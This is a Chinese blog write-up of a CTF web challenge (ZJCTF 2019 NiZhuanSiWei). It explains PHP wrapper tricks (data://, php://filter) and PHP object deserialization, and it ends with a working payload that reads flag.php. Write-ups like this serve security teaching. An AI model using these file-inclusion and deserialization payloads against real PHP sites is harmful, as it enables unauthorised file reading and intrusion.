[ZJCTF 2019]NiZhuanSiWei1 详解

已于 2022-12-03 12:07:33 修改
阅读量1.9k 收藏 21
点赞数 8
文章标签: php web安全
于 2022-12-03 12:06:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_63548648/article/details/128159589
版权

 打开题目,给了一些源码

<?php  
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        echo "Not now!";
        exit(); 
    }else{
        include($file);  //useless.php
        $password = unserialize($password);
        echo $password;
    }
}
else{
    highlight_file(__FILE__);
}
?>

以上就是题目给的源码,接下来我是咋样判断是用php伪协议做的呢

1、file_get_contents($text,'r')==="welcome to the zjctf")//  根据一行代码,首先file_get_contents是得读取到"文件"里的内容,而$text是一个变量,file_get_contents不能读取一个变量,(可以自己去本地测试一下),所以就必须得让$text变成一个文件,就必须得用到php伪协议中的    data:// 协议      data:// 协议 就是把字符串包装成一个文件来执行。

 

 2、第二个原因是  include($file);  //useless.php  当直接访问useless.php时,没有出现任何东西,就可以判断这可能需要    php://filter  来读取,通过以上判断,就可以得出这是个考php伪协议的题目。

 通过以上猜想  现在就开始解题。

成功读取到,如果没用data的话。

 根本没有读取到。

接下来就是用到preg_match()正则匹配函数了,

 

 如果查找到的话,就会返回  1  ,否则返回  0;

 所以file中不能包含flag,如果包含的话,就会执行,然后退出,拿不到flag,所以根据提示useless.php,先读取其里面的代码。

 由于我使用的过滤器是base64编码的,所以我们就得去解码。

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

得到这个代码。这里面用到了一个  toString() 函数,我们该怎么触发,

__tostring函数在  类    被echo、print等输出时会被调用,因为源代码中echo $password,所以这里给password传递序列换字符串。

__construct(),构造函数时

__destruct(),析构函数时

__call(),在对象中调用一个不可访问方法时调用

__callStatic(),用静态方式中调用一个不可访问方法时调用

__get(),获得一个类的成员变量时调用

__set(),设置一个类的成员变量时调用

__isset(),当对不可访问属性调用isset()或empty()时调用

__unset(),当对不可访问属性调用unset()时被调用。

__sleep(),执行serialize()时,先会调用这个函数

__wakeup(),执行unserialize()时,先会调用这个函数

__toString(),类被当成字符串时的回应方法

__invoke(),调用函数的方式调用一个对象时的回应方法

__set_state(),调用var_export()导出类时,此静态方法会被调用。

__clone(),当对象复制完成时调用

__autoload(),尝试加载未定义的类

__debugInfo(),打印所需调试信息

 以下是构造的序列化代码,

<?php
    class Flag
    {  
        public $file='flag.php';
    }
    $a=new Flag;
    echo serialize($a) ;
?>

解释一下为什么要这样写。

 

 根据题目给的代码,就是我们在序列化之后,赋值给password,password会被反序列化成原来的代码在赋值给password,然后echo $password,就相当于echo 了一个类,就会触发到我们写的代码里的tostring,最后就会

这里面的file为我们设置的flag.php。

 

 最后在源码里拿到flag.

playlod :?text=data://text/plain,welcome to the zjctf&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

大佬的php伪协议详解

php - PHP伪协议总结_个人文章 - SegmentFault 思否

PHP伪协议详解-网络知识

有两篇   可以结合起来学习学习  

实在看不懂的还可以b站看这个博主讲的。

ctf-网络安全从入门到放弃-nizhuansiwei_哔哩哔哩_bilibili

ke1nys
关注
SPI协议详解(图文并茂+超详细)
一名热爱技术的工程师的博客。分享技术干货,记录美好生活。永远相信美好的事情即将发生。
11-03 25万+
先说串口 因为之前写过一篇UART,通用串行异步通讯协议,UART的相关资料 因为UART没有时钟信号,无法控制何时发送数据,也无法保证双发按照完全相同的速度接收数据。因此,双方以不同的速度进行数据接收和发送,就会出现问题。 如果要解决这个问题,UART为每个字节添加额外的起始位和停止位,以帮助接收器在数据到达时进行同步; 双方还必须事先就传输速度达成共识(设置相同的波特率,例如每秒9600位)。 传输速率如果有微小差异不是问题,因为接收器会在每个字节的开头重新同步。相应的协议如下图所示; 如果您注意到
Arthas 使用详解
最新发布
congge
10-11 1万+
Arthas 使用详解
[ZJCTF 2019]NiZhuanSiWei【超详细讲解】
wo41ge的博客
11-15 3963
进入题目链接 这是源码 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1>
[ZJCTF 2019]NiZhuanSiWei
brainw的博客
04-22 2631
[ZJCTF 2019]NiZhuanSiWei 代码审计 查看一下useless.php --只有注释信息 没有用 利用data协议绕过 将welcome to the zjctf写入 而data://协议允许读入 payload: text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 到这里就不会了 只有看下wp了 正则判断...
魔术方法总结
梦里不知身是客
12-26 9862
__construct(),类的构造函数 __destruct(),类的析构函数 __call(),在对象中调用一个不可访问方法时调用 __callStatic(),用静态方式中调用一个不可访问方法时调用 __get(),获得一个类的成员变量时调用 __set(),设置一个类的成员变量时调用 __isset(),当对不可访问属性调用isset()或empty()时调用 __unset(
[ZJCTF 2019]NiZhuanSiWei 1
feng的博客
10-23 1339
知识点 文件包含与各种协议 反序列化 WP 首先进入环境,得到源码: $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r').
[SUCTF 2019]CheckIn 1(详解
qq_52843575的博客
12-12 6190
1.基础检测 进入页面是一个简单文件上传界面,正常上传文件,发现上传空内容的jpg文件显示(exif_imagetype:not image!),可知有内容检测,上传代码文件也发现后缀名过滤 开始抓包操作,因为后缀名验证,伪造文件属性也失效了,与此同时发现“?”被过滤了简单利用 2.解题关键 这道题解题关键在于怎样突破后缀名绕过,就得利用.user.ini文件留后门了 user.ini留后门原理 简单来说,就是利于.user.ini指定文件,在其当前目录下的文件执行时会将你指定的文件中的代码执行出
Keras深度学习实战(1)——神经网络基础与模型训练过程详解
热门推荐
盼小辉丶的博客
04-10 4万+
神经网络是一种性能强大的学习算法,其灵感来自大脑的运作方式。类似于神经元在大脑中彼此连接的方式,神经网络获取输入后,通过某些函数在网络中进行传递输入信息,连接在其后的一些神经元会被激活,从而产生输出。本文主要介绍神经网络中重要的基础知识,然后使用 Python 从零开始构建神经网络的训练流程,包括前向传播和反向传播,更直观的了解神经网络的通用训练流程。............
myeclipse2019安装教程详解
qq_40861906的博客
02-01 3936
1.myeclipse安装包下载 刚开始我是去官网下载的myeclipse2020.9.16,找了半天没找到对应得破解工具,果断卸载。我是下载的myeclipse-ci-2019.4.0。下载链接见我的资源。 2.破解工具下载 下载链接见我的资源。 3.java环境配置 运行破解软件需要配置java环境,配置教程可自行百度。在这里需要注意的是jdk版本不能过高否则会出错,我使用的是jdk8,下载链接见我的资源。 4.破解过程 4.1. 找到myeclipse破解工具中的path文件夹,把
浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(php几个协议的运用)
weixin_45844670的博客
09-23 1420
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"
oop魔术方法
小码农的博客
04-21 757
魔术方法是PHP面向对象中特有的特性。它们在特定的情况下被触发,都是以双下划线开头,你可以把它们理解为钩子,利用模式方法可以轻松实现PHP面向对象中重载(Overloading即动态创建类属性和方法)。魔术方法很多还是成对出现的,以下列出目前PHP中所有的模式方法。 1.__construct,__destruct __constuct构建对象的时被调用; __destruct明
VS2019配置OpenCV详解及实战教程
1. 环境配置前提:本文适用于Windows 10系统,且推荐使用的OpenCV版本为3.4.1,因其与VS2019有更好的兼容性,避免了4.0.1版本可能遇到的问题。 2. 安装步骤:首先,从OpenCV官方网站下载3.4.1版本的安装包,注意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值